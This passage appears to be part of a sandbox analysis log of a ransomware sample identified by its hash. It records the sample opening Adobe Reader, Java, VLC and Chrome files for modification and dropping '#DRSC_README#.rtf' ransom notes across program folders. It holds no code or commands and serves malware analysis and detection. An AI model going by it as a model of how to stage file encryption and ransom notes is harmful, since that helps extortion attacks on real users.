DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_patterns_header.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ar-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\share_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-US.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\s_empty_folder_state.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\org-openide-util.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_LinkNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-4x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\file_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\blacklist 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.war 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-BR.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\circle.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\wsgen.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses_selected.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\virgo_mycomputer_folder_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\pack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Compare_R_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_patterns_header.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ro_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\startNetworkServer 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-press.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\local_policy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoSearchResults_180x160.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Bold.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-compat.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\rmiregistry.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\new_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\dd_arrow_small2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\cloud_secured_lg.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Close.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\content-types.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ar_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\files_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_organize_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\nashorn.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\nub.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program 